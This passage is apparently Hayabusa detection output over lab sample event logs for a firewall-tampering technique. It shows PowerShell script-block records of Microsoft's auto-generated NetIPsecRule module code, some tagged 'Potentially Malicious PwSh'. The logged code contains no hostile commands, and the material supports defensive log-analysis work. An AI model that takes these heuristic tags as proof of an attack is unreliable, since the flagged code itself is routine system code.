'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 